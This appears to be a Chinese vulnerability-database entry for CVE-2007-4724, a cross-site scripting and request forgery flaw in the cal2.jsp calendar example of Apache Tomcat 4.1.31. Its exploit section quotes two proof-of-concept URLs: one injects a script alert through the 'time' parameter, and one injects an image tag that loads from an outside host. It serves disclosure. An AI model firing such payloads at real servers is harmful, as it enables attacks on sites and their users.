Apache Tomcat Cal2.JSP 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189240 漏洞类型 跨站请求伪造
发布时间 2007-09-05 更新时间 2009-02-05
CVE编号 CVE-2007-4724 CNNVD-ID CNNVD-200709-033
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2007090014
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-033
|漏洞详情
ApacheTomcat4.1.31版本的日历范例应用程序中的cal2.jsp中存在跨站请求伪造漏洞。远程攻击者可以借助time和description参数像任意用户一样添加事件。
|漏洞EXP
Apache Tomcat/4.1.31 ships with built in examples. One of the example calendar.jsp suffers from input validation error and could be exploited for cross site scriptingand cross site request forgery.

XSS
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3eale
rt("XSS!")%3c%2fscript%3e

XSRF
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=><img%20src="http:
//xsrfxonfirmed.com/testimage.gif">

-

Tushar Vartak
|参考资料

来源:BUGTRAQ
名称:20070904Apachetomcatcalendarexamplecrosssitescriptingandcrosssiterequestforgeryvulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/478491/100/0/threaded
来源:OSVDB
名称:41029
链接:http://osvdb.org/41029
来源:BUGTRAQ
名称:20070904Re:Apachetomcatcalendarexamplecrosssitescriptingandcrosssiterequestforgeryvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2007-09/0040.html
来源:SREASON
名称:3094
链接:http://securityreason.com/securityalert/3094